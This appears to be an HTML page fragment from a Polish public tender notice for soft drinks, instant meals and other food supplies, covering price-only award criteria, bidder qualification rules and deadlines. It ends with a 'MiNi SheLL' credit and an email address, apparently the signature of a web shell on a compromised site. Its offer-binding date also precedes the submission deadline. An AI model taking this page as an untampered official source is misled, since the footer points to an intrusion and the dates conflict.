class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa napoi bezalkoholowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 80607,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15980000-1 - Napoje bezalkoholowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa dań instant </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 125060,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15894300-4 - Dania gotowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa różnych produktów spożywczych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 85529,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15890000-3 - Różne produkty spożywcze i produkty suszone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załączniki nr 1.1-1.2 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) suma zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a.	Zamawiający wymaga, aby wykonawca spełniał dodatkowe warunki udziału w postepowaniu, tj.:<br/>	posiadał zdolność występowania w obrocie gospodarczym (art. 113 uPZP), zamawiający nie stawia warunków w tym zakresie.<br/>	posiadał uprawnienia do prowadzenia działalności (art. 114 uPZP), i na potwierdzenie złożył: <br/>	aktualną decyzję państwowego powiatowego inspektora sanitarnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia<br/>lub<br/>	zaświadczenie o wpisie do rejestru zakładów wydane przez organ urzędowej kontroli Państwowej Inspekcji Sanitarnej<br/>	posiadał sytuację ekonomiczną lub finansową (art. 115 uPZP), i na potwierdzenie złożył:<br/>	Warunek będzie spełniony jeśli Wykonawca wykaże, że posiada kopie polisy OC potwierdzoną za zgodność z oryginałem w zakresie prowadzonej działalności gospodarczej ważną w okresie realizacji Umowy, posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego. Wartość polisy nie może być mniejsza niż co najmniej wartości złożonej oferty zamówienia podstawowego brutto.<br/>	posiadał zdolność techniczną lub zawodową (art. 116 uPZP):<br/>	Wykonawca zobowiązany jest do wykazania należytego wykonania umowy, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: dostaw odpowiadających swoim zakresem przedmiotowi zamówienia w niniejszym postępowaniu . Wykonawca na potwierdzenie powinien złożyć wykaz - załącznik nr 8 do SWZ oraz przedłoży referencje bądź poświadczenie należytego wykonania co najmniej jednej umowy trwającej przez okres minimum 6 miesięcy, wydane przez Zamawiającego, u którego wykonywał dostawy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	„Oświadczenie wykonawcy” - załącznik nr 5 do SWZ, składa zarówno wykonawca korzystający, jak i nie korzystający z zasobów podmiotów trzecich.<br/>b.	„Oświadczenie podmiotu trzeciego” - załącznik nr 7 do SWZ, składa każdy z podmiotów udostępniający swoje zasoby.<br/>c.	„Oświadczenie współwykonawcy” – załącznik nr 6 do SWZ, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dowody na spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy uczestnik postępowania wykazuje ich spełnianie: <br/>	posiadał zdolność występowania w obrocie gospodarczym (art. 113 uPZP): zamawiający nie stawia warunków w tym zakresie.<br/>	posiadał uprawnienia do prowadzenia działalności (art. 114 uPZP), i na potwierdzenie złożył: <br/>	aktualną decyzję państwowego powiatowego inspektora sanitarnego o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących przedmiot zamówienia<br/>lub<br/>	zaświadczenie o wpisie do rejestru zakładów wydane przez organ urzędowej kontroli Państwowej Inspekcji Sanitarnej<br/>	posiadał sytuację ekonomiczną lub finansową (art. 115 uPZP), i na potwierdzenie złożył:<br/>	Warunek będzie spełniony jeśli Wykonawca wykaże, że posiada kopie polisy OC potwierdzoną za zgodność z oryginałem w zakresie prowadzonej działalności gospodarczej ważną w okresie realizacji Umowy, posiadającą rozszerzony zakres ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego. Wartość polisy nie może być mniejsza niż co najmniej wartości złożonej oferty zamówienia podstawowego brutto.<br/>	posiadał zdolność techniczną lub zawodową (art. 116 uPZP):<br/>	Wykonawca zobowiązany jest do wykazania należytego wykonania umowy, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: dostaw odpowiadających swoim zakresem przedmiotowi zamówienia w niniejszym postępowaniu. Wykonawca na potwierdzenie powinien złożyć wykaz - załącznik nr 8 do SWZ oraz przedłoży referencje bądź poświadczenie należytego wykonania co najmniej jednej umowy trwającej przez okres minimum 6 miesięcy, wydane przez Zamawiającego, u którego wykonywał dostawy</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a. Wykonawcy, którzy zamierzają skorzystać z zasobów podmiotów trzecich, niezależnie od charakteru prawnego łączących<br/>go z nimi stosunków prawnych.<br/>􀀀 Wykonawca powinien samodzielnie spełniać warunek dotyczący zdolności do występowania w obrocie gospodarczym i<br/>posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>􀀀 Wykonawca może skorzystać ze zdolności technicznych lub zdolności zawodowych podmiotów trzecich o ile podmiot<br/>udostępniający zasoby osobiście wykona usługę, do realizacji której te zdolności są wymagane.<br/>􀀀 Wykonawca może skorzystać z sytuacji finansowej lub sytuacji ekonomicznej podmiotów trzecich i warunek zostanie<br/>spełniony jeżeli spełnią go wspólnie.<br/>b. Wykonawcy, którzy wspólnie ubiegają się o zamówienie, tworząc np. spółkę cywilną, lub konsorcjum.<br/>􀀀 Zgodnie z art. 58 ust. 2, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, powinni ustanowić pełnomocnika<br/>do reprezentowania ich w postępowaniu, albo do reprezentowania ich w postępowaniu i do zawarcia umowy. W przypadku<br/>spółki cywilnej dokumentem zastępującym pełnomocnictwo może być umowa spółki lub uchwała wspólników.<br/>􀀀 Pełnomocnik działa w imieniu wszystkich współwykonawców i jego działania wywołują skutki prawne wobec nich<br/>wszystkich. W toku postępowania korespondencja ze strony zamawiającego będzie kierowana wyłącznie do pełnomocnika.<br/>􀀀 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zostanie spełniony jeżeli co najmniej jeden z nich samodzielnie spełnia ten warunek i osobiście zrealizuje świadczenie, do którego realizacji jest<br/>wymagany.<br/>􀀀 Warunek dotyczący zdolności technicznych lub zawodowych zostanie spełniony jeżeli co najmniej jeden ze z nich<br/>samodzielnie spełnia ten warunek i osobiście zrealizuje świadczenie, do którego jest wymagany.<br/>􀀀 Warunek dotyczący potwierdzenia sytuacji finansowej lub ekonomicznej, współwykonawcy mogą spełniać łącznie.<br/>􀀀 Warunek dotyczący występowania w obrocie gospodarczym, powinien spełniać każdy ze współwykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a. Zamawiający przewiduje możliwość zmiany treści zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 uPZP oraz wskazanym w Projektowanych postanowieniach umowy - załączniki nr 1.1-1.2.<br/>b. Zamawiający zgodnie z art. 440 w związku z art. 439 ust. 2-4 uPZP, przewiduje możliwość zmiany wynagrodzenia w<br/>przypadku zmiany cen materiałów lub kosztów związanych z realizacją zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com